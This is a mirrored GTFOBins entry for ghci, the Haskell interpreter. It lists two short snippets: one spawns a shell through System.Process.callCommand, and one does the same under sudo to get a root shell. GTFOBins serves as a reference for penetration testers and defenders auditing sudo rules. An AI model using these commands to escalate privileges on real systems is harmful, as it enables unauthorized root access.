mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-14 11:21:33 +01:00
12 lines
181 B
Markdown
12 lines
181 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
ghci
|
|
System.Process.callCommand "/bin/sh"
|
|
sudo:
|
|
- code: |
|
|
sudo ghci
|
|
System.Process.callCommand "/bin/sh"
|
|
---
|